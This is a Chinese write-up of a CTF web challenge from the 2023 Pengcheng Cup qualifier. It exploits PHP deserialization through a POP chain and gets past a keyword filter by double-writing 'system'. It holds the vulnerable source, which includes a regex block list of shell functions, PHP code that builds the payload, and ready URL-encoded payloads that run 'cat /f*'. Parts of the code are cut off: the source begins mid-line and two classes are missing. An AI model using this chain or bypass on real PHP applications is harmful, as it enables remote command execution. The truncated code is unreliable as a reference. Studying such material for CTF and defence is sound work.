【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)

考点:

常规的PHP反序列化漏洞+双写绕过waf 签到题

源码:

hacker->name;
        return "";
    }
}
class C
{
    public $finish;
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
class E
{
    public $hacker;

    public  function __invoke($parms1)
    {
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username="admin";
    public function __destruct()
    {
        $this->welcome();

    }
    public  function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}

class K
{
    public $func;
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}

class R
{
    private $method;
    private $args;

    public  function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}

function nonono($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$a = $_POST["pop"];
if (isset($a)){
    unserialize(nonono($a));
}
?>

代码审计:

入口肯定是H. __destruct()魔术方法进去,然后这里就涉及到下一步tostring()魔术方法的触发 ,但是这里涉及两个tostring()方法 然后这里就有个非预期解

非预期解:

 POP链:H.destruct()->Hacker.tostring()

代码构造:

username = new Hacker();
echo urlencode(serialize($a));

payload:

O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A6%3A%22Hacker%22%3A2%3A%7Bs%3A11%3A%22%00Hacker%00exp%22%3BN%3Bs%3A11%3A%22%00Hacker%00cmd%22%3BN%3B%7D%7D

可以得到flag 

预期解:

 我们触发A.tostring()的魔术方法, 找到到出口call_user_func_array(),然后一步一步触发下面的魔术方法

POP链:

H.destruct()->A.tostring()->C.get()->K.call()->E.invoke()->R.welcome()

 代码构造:

key = true;  //ture 设为真才能进入if语句
        @$this->finish1->name = true; //ture 设为真才能进入if语句;@。当将其放置在一个 PHP 表达式之前,该表达式可能产生的任何错误信息都被忽略掉。
        @$this->finish->finish = true;//ture 设为真才能进入if语句
        $this->method = "system";   //这个会被ban
        $this->args = array("cat /f*"); // 下面这个就是构造命令执行 只有设为数组是因为这里要知道call_user_func()函数如果传入的参数是array类型的话,会将数组的成员当做类名和方法
    }
}

$h = new H();
$h->username = new A();
$h->username->hacker = new C();
$h->username->hacker->finish = new K();
$h->username->hacker->finish->func = new E();
$h->username->hacker->finish->func->hacker = new R();
$s = serialize($h);
$s = preg_replace("/system/", "syssystemtem", $s); //对system进行双写绕过

echo urlencode($s);

【wp】2023鹏城杯初赛 Web web1(反序列化漏洞)_第1张图片

payload;

O%3A1%3A%22H%22%3A1%3A%7Bs%3A8%3A%22username%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22C%22%3A1%3A%7Bs%3A6%3A%22finish%22%3BO%3A1%3A%22K%22%3A1%3A%7Bs%3A4%3A%22func%22%3BO%3A1%3A%22E%22%3A1%3A%7Bs%3A6%3A%22hacker%22%3BO%3A1%3A%22R%22%3A5%3A%7Bs%3A9%3A%22%00R%00method%22%3Bs%3A6%3A%22syssystemtem%22%3Bs%3A7%3A%22%00R%00args%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A7%3A%22cat+%2Ff%2A%22%3B%7Ds%3A3%3A%22key%22%3Bb%3A1%3Bs%3A7%3A%22finish1%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A4%3A%22name%22%3Bb%3A1%3B%7Ds%3A6%3A%22finish%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22finish%22%3Bb%3A1%3B%7D%7D%7D%7D%7D%7D%7D

得到flag

你可能感兴趣的:(反序列化漏洞,CTF,CTF,web安全,PHP反序列化漏洞)